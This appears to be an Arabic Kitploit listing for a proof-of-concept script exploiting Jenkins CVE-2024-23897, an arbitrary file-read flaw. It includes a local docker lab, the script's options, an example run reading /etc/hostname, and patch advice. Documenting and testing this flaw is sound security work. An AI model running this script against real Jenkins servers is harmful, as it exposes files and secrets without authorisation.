Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Jenkins-CVE-2024-23897 — إثبات المفهوم لـ Jenkins CVE-2024-23897 | Kitploit
أدوات/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

إثبات المفهوم لـ Jenkins CVE-2024-23897

عرض المستودع
11منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

Jenkins CVE-2024-23897 PoC

برهان المفهوم (PoC) لـ CVE-2024-23897، وهي ثغرة قراءة ملفات عشوائية في واجهة سطر الأوامر المدمجة في Jenkins (CLI). تسمح للمهاجمين غير المصادق عليهم بصلاحية Overall/Read بقراءة ملفات عشوائية على نظام ملفات وحدة التحكم في Jenkins.

الإصدارات المتأثرة

  • إصدارات Jenkins <= 2.441
  • إصدارات Jenkins LTS <= 2.426.2

إعداد مثيل ضعيف

قم بتشغيل مثيل ضعيف محلياً باستخدام docker compose:

root@kitploit:~
cd docker
docker compose up -d

سيكون المثيل متاحاً على http://localhost:1234

الاستغلال

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

مثال

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

قد يواجه السكريبت مشاكل في قراءة الملفات الأكبر حجماً بسبب التوافقية وانتهاء فترة الاتصال. لمزيد من التفاصيل التقنية ودليل تفصيلي للثغرة، ألق نظرة على منشور مدونتي حول الموضوع.

الإصلاح

  • قم بالترقية إلى Jenkins 2.442 أو LTS 2.426.3
  • قم بتطبيق الحلول البديلة المؤقتة كما هو موصوف في تنبيه أمان Jenkins.

روابط ذات صلة

  • Sonar Source | التوسع المفرط: كشف ثغرات أمنية حرجة في Jenkins
  • تنبيه أمان Jenkins - 2024-01-24
  • Qualys ThreatPROTECT | ثغرة تنفيذ الأوامر عن بُعد في نواة Jenkins (CVE-2024-23897)
  • CVE-2024-23897: تقييم تأثير ثغرة تسريب الملفات العشوائية في Jenkins – Horizon3.ai
تنزيل الأداة